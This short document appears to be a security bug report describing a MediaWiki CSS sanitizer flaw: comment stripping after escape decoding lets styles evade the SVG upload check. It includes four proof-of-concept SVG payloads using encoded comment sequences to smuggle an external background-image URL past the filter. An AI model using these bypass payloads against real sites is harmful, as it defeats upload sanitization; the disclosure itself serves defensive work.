Sanitizer::normalizeCss() removes CSS comments from its input. This happens after certain escape sequences are decoded and after certain characters are replaced with others, making it possible to hide CSS code from UploadBase::checkCssFragment().
Some examples:
<svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" style="&#47;*;background-image:url(https://www.google.com/images/srpr/logo11w.png)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" style="\/*;background-image:url(https://www.google.com/images/srpr/logo11w.png)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" style="\2f *;background-image:url(https://www.google.com/images/srpr/logo11w.png)"/> </svg>
<svg xmlns="http://www.w3.org/2000/svg"> <rect width="100" height="100" style="/*;background-image:url(https://www.google.com/images/srpr/logo11w.png)"/> </svg>